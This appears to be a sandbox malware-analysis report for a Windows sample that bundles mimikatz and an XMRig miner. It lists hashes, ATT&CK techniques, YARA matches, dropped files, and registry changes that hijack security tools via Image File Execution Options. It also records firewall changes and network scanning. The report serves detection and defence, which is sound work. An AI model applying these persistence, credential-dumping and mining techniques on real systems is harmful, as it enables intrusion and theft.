mimikatz | a46cadfe282b73c47f5a274a2156ac4269a41112e1e96b458ffbdd9b0fb54e96

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
04-09-2024 13:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

202409048385e57d9d5bb1672dd3c941df8e8db2hacktoolsicedidmimikatz.exe
Size

9.0MB
MD5

8385e57d9d5bb1672dd3c941df8e8db2
SHA1

6c54566a4b74d1fab6f88e933dd123dbc82f4932
SHA256

a46cadfe282b73c47f5a274a2156ac4269a41112e1e96b458ffbdd9b0fb54e96
SHA512

572bd7035a4b1daba3d442e148ed5b8541c0e206a0d6d009cfaa7e51081c9ff64b8f0bb03fc4ef4f01b2eb4626a7d2fbaa86d636ecc8e38461667ad65b07b53d
SSDEEP

196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1380 created 2104	1380	iuclszl.exe	38

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (19015) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral2/memory/1396-177-0x00007FF630910000-0x00007FF630A30000-memory.dmp	xmrig
behavioral2/memory/1396-185-0x00007FF630910000-0x00007FF630A30000-memory.dmp	xmrig
behavioral2/memory/1396-202-0x00007FF630910000-0x00007FF630A30000-memory.dmp	xmrig
behavioral2/memory/1396-215-0x00007FF630910000-0x00007FF630A30000-memory.dmp	xmrig
behavioral2/memory/1396-225-0x00007FF630910000-0x00007FF630A30000-memory.dmp	xmrig
behavioral2/memory/1396-234-0x00007FF630910000-0x00007FF630A30000-memory.dmp	xmrig
behavioral2/memory/1396-245-0x00007FF630910000-0x00007FF630A30000-memory.dmp	xmrig
behavioral2/memory/1396-262-0x00007FF630910000-0x00007FF630A30000-memory.dmp	xmrig
behavioral2/memory/1396-263-0x00007FF630910000-0x00007FF630A30000-memory.dmp	xmrig
behavioral2/memory/1396-265-0x00007FF630910000-0x00007FF630A30000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/2312-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/2312-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x000800000002345c-6.dat	mimikatz
behavioral2/memory/2128-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/4344-137-0x00007FF6A0BA0000-0x00007FF6A0C8E000-memory.dmp	mimikatz

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	iuclszl.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iuclszl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	iuclszl.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1400	netsh.exe
4128	netsh.exe

Executes dropped EXE 27 IoCs

pid	Process
2128	iuclszl.exe
1380	iuclszl.exe
2652	wpcap.exe
3516	qeteblhlu.exe
4344	vfshost.exe
1080	teaimmcwl.exe
5036	xohudmc.exe
3004	wooakm.exe
1396	nqrzsm.exe
2748	teaimmcwl.exe
3088	teaimmcwl.exe
3508	teaimmcwl.exe
2016	iuclszl.exe
1252	teaimmcwl.exe
4128	teaimmcwl.exe
1608	teaimmcwl.exe
1968	teaimmcwl.exe
4964	teaimmcwl.exe
1144	teaimmcwl.exe
1800	teaimmcwl.exe
5036	teaimmcwl.exe
4740	teaimmcwl.exe
3032	teaimmcwl.exe
208	teaimmcwl.exe
1952	teaimmcwl.exe
1304	nvmribbga.exe
5392	iuclszl.exe

Loads dropped DLL 12 IoCs

pid	Process
2652	wpcap.exe
2652	wpcap.exe
2652	wpcap.exe
2652	wpcap.exe
2652	wpcap.exe
2652	wpcap.exe
2652	wpcap.exe
2652	wpcap.exe
2652	wpcap.exe
3516	qeteblhlu.exe
3516	qeteblhlu.exe
3516	qeteblhlu.exe

UPX packed file 33 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000234af-135.dat	upx
behavioral2/memory/4344-136-0x00007FF6A0BA0000-0x00007FF6A0C8E000-memory.dmp	upx
behavioral2/memory/4344-137-0x00007FF6A0BA0000-0x00007FF6A0C8E000-memory.dmp	upx
behavioral2/files/0x00070000000234ba-140.dat	upx
behavioral2/memory/1080-141-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/1080-159-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/files/0x00070000000234b7-163.dat	upx
behavioral2/memory/1396-164-0x00007FF630910000-0x00007FF630A30000-memory.dmp	upx
behavioral2/memory/2748-170-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/3088-174-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/1396-177-0x00007FF630910000-0x00007FF630A30000-memory.dmp	upx
behavioral2/memory/3508-179-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/1396-185-0x00007FF630910000-0x00007FF630A30000-memory.dmp	upx
behavioral2/memory/1252-188-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/4128-192-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/1608-196-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/1968-200-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/1396-202-0x00007FF630910000-0x00007FF630A30000-memory.dmp	upx
behavioral2/memory/4964-205-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/1144-209-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/1800-213-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/1396-215-0x00007FF630910000-0x00007FF630A30000-memory.dmp	upx
behavioral2/memory/5036-219-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/4740-223-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/1396-225-0x00007FF630910000-0x00007FF630A30000-memory.dmp	upx
behavioral2/memory/3032-228-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/208-231-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/1952-233-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp	upx
behavioral2/memory/1396-234-0x00007FF630910000-0x00007FF630A30000-memory.dmp	upx
behavioral2/memory/1396-245-0x00007FF630910000-0x00007FF630A30000-memory.dmp	upx
behavioral2/memory/1396-262-0x00007FF630910000-0x00007FF630A30000-memory.dmp	upx
behavioral2/memory/1396-263-0x00007FF630910000-0x00007FF630A30000-memory.dmp	upx
behavioral2/memory/1396-265-0x00007FF630910000-0x00007FF630A30000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
70	ifconfig.me
71	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	iuclszl.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\SysWOW64\wooakm.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	iuclszl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	iuclszl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	iuclszl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE	iuclszl.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\wooakm.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	iuclszl.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	iuclszl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	iuclszl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	iuclszl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	iuclszl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE	iuclszl.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\xdvl-0.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\AppCapture64.dll	iuclszl.exe
File created	C:\Windows\bekggbli\svschost.xml	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\ucl.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\svschost.xml	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\tucl-1.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\docmicfg.xml	iuclszl.exe
File created	C:\Windows\bekggbli\docmicfg.xml	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\vefdcrtiv\scan.bat	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\vefdcrtiv\nvmribbga.exe	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\posh-0.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\trfo-2.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\exma-1.dll	iuclszl.exe
File opened for modification	C:\Windows\bekggbli\schoedcl.xml	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\libeay32.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\Shellcode.ini	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\Corporate\mimilib.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\svschost.exe	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\schoedcl.xml	iuclszl.exe
File created	C:\Windows\bekggbli\spoolsrv.xml	iuclszl.exe
File opened for modification	C:\Windows\dvpvfgkqq\vefdcrtiv\Result.txt	nvmribbga.exe
File opened for modification	C:\Windows\dvpvfgkqq\vefdcrtiv\Packet.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\docmicfg.xml	iuclszl.exe
File created	C:\Windows\bekggbli\vimpcsvc.xml	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\ssleay32.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\svschost.xml	iuclszl.exe
File created	C:\Windows\ime\iuclszl.exe	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\cnli-1.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\coli-0.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\libxml2.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\Corporate\vfshost.exe	iuclszl.exe
File created	C:\Windows\bekggbli\iuclszl.exe	202409048385e57d9d5bb1672dd3c941df8e8db2hacktoolsicedidmimikatz.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\docmicfg.exe	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\vimpcsvc.xml	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\zlib1.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\vefdcrtiv\ip.txt	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\Corporate\mimidrv.sys	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\crli-0.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\schoedcl.exe	iuclszl.exe
File opened for modification	C:\Windows\bekggbli\docmicfg.xml	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\vefdcrtiv\Packet.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\vimpcsvc.xml	iuclszl.exe
File opened for modification	C:\Windows\bekggbli\vimpcsvc.xml	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\AppCapture32.dll	iuclszl.exe
File opened for modification	C:\Windows\bekggbli\iuclszl.exe	202409048385e57d9d5bb1672dd3c941df8e8db2hacktoolsicedidmimikatz.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\trch-1.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\spoolsrv.xml	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\vimpcsvc.exe	iuclszl.exe
File opened for modification	C:\Windows\dvpvfgkqq\Corporate\log.txt	cmd.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\schoedcl.xml	iuclszl.exe
File created	C:\Windows\bekggbli\schoedcl.xml	iuclszl.exe
File opened for modification	C:\Windows\bekggbli\svschost.xml	iuclszl.exe
File opened for modification	C:\Windows\bekggbli\spoolsrv.xml	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\upbdrjv\swrpwe.exe	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\tibe-2.dll	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\specials\spoolsrv.exe	iuclszl.exe
File created	C:\Windows\dvpvfgkqq\UnattendGC\spoolsrv.xml	iuclszl.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1244	sc.exe
4608	sc.exe
4900	sc.exe
4596	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
